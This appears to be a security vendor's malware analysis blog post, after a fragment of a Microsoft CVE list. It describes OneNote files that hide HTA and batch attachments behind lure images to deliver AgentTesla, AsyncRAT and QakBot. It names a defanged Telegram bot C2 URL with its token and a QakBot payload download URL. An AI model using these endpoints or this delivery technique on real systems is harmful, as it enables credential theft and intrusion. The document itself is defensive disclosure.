There are no known exploits in the wild.
CVE-2023-23377 3D Builder Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-23378 Print 3D Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-23379 Microsoft Defender for IoT Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2023-23381 Visual Studio Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-23382 Azure Machine Learning Compute Instance Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2023-23390 3D Builder Remote Code Execution Vulnerability
There are no known exploits in the wild.

Microsoft OneNote files are widely used to deliver malware payloads

/in /by

There is a never ending run between the threat actors and the security software. The malware authors always look for techniques which can penetrate the active security defenses to get access of victim’s machine and one of the way is, to switch among low profile file types to carry the malicious payload. The malware authors are now using OneNote files which were rarely used for malicious purpose in the past. For the last few weeks, SonicWall RDTMI has been detecting a spike of malicious OneNote files that are being delivered to the victim’s machine as email attachments. SonicWall threat research team observed that the OneNote files are delivering AgentTesla, AysncRAT and QakBot malware. Threat actors are attaching HTML Application (HTA) files, batch files and Portable Executable (PE) files into the OneNote pages and hide the attached files behind an image. The image displays a message to lure the victim to click on them (contains a hidden attachment) which then triggers the malware execution:

Case 1 (Payload: AgentTesla)

Threat actor attaches malicious HTML Application (HTA) file into the OneNote page and duplicates the attachment references, to wider the user click area to access the attachment. The attachments are hidden by overlapping two images, first image is a blurred image which further overlapped by another image which asks user to “View Document”. Once user clicks on the image it will trigger the execution of hidden HTA file:

The HTA file executes two PowerShell instances, one instance to show some image from the web and other instance to download and execute AgentTesla malware on the victim’s machine:

 

The blurred HSBC document from the web is displayed, to mislead the user while performing the malicious activity in the background:

 

The second PowerShell instance starts execution of the downloaded executable in the background which further executes VBScript file and injects the AgentTesla payload into RegSvcs.exe which exfiltrates and sends the user data to its telegram hosted Command and Control (C2) server h[t][t]ps://api.telegram.org/bot5729374237:AAEdSD-W5rWlJyyU5nwVKvjLxJBT1jTdKRY/:

 

 

Case 2 (Payload: AsyncRAT)

Threat actor attaches an obfuscated batch file into the OneNote page. The batch attachment is hidden behind the image which asks user “Click to view document”. The file contains background image of displaying text DHL WORLDWIDE EXPRESS to pretending itself as a delivery document:

 

The Batch file is obfuscated which drops the PowerShell executable into OneNote temp folder with name “invoice.bat.exe” and executes a PowerShell script using the dropped PowerShell executable:

 

 

The PowerShell script reads data from the batch file and decrypts it. The decrypted data is decompressed to get the AsyncRAT executable file which is then executed:

 

The AsyncRAT is widely know malware and its source code is available on the GitHub:

 

In one of the AsyncRAT delivering variant, we have seen the OneNote page is attached with an executable file which further drops a bat file to continue execution, which results in executing AsyncRAT on the victim’s machine:

 

Case 3 (Payload: QakBot)

Threat actor attaches a batch commands file into the OneNote page. The attached file is hidden behind the image which asks user “Open”. The OneNote page also contains image displaying text “This document contains attachments from the cloud, to receive them, double click “open”:

The batch commands file executes PowerShell cmdlet which drops and executes another batch file into C:\Users\Public\aSUNY81.cmd and passes two arguments:

 

The dropped script downloads the QakBot payload from the URL h[t][t]ps://famille2point0.com/oghHO/01.png which is provided as second argument. The QakBot Dynamic Link Library (DLL) is executed by calling the export function Wind:

 

The QakBot injects the malicious payload into iexplorer.exe using process injection. QakBot binary uses tradition method for injecting the payload which involves opening the iexplorer.exe in suspended mode using CreateProcess API, then allocating memory into the iexplorer.exe and writing the payload data into it. After injecting code, mostly malware changes the Instruction Pointer (EIP) to the injected code using SetThreadContext API but QakBot modifies the bytes at EIP which jumps to the injected code:

 

IOCs

SHA256 OneNote files:

8fc8a2b79cb0c0f8113993056e682cd9b56140781cad6bfeabfeac8e6df543e1

1d27ed598f1eab480f067c8920d8f9cd7f7da8b1833d0f58f75d2e2944589210

0a001cf1fd5f6d6994a1635f87493723ba6c6299b67fdf1569c341c87b8aeda1

 

SHA256 PE files:

b75aad495d0bff2f1b5a2b89a8df42a9257f1f01394c859f3ad2bb40d91607d3

a18402d77acd4d9c8b9ae637ffb8ef44b566c777902bb95d81a8cb6c23fec9e7

53a1cbccdb9988dca39ce32963a951b4f8b9d843db57c288195e1cd160bd7f17

 

 

Unavailability of the archive file in any of the popular threat intelligence sharing portals like the VirusTotal and the ReversingLabs indicates its uniqueness and limited distribution:

 

Evidence of detection by RTDMI ™ engine can be seen below in the Capture ATP report for this file: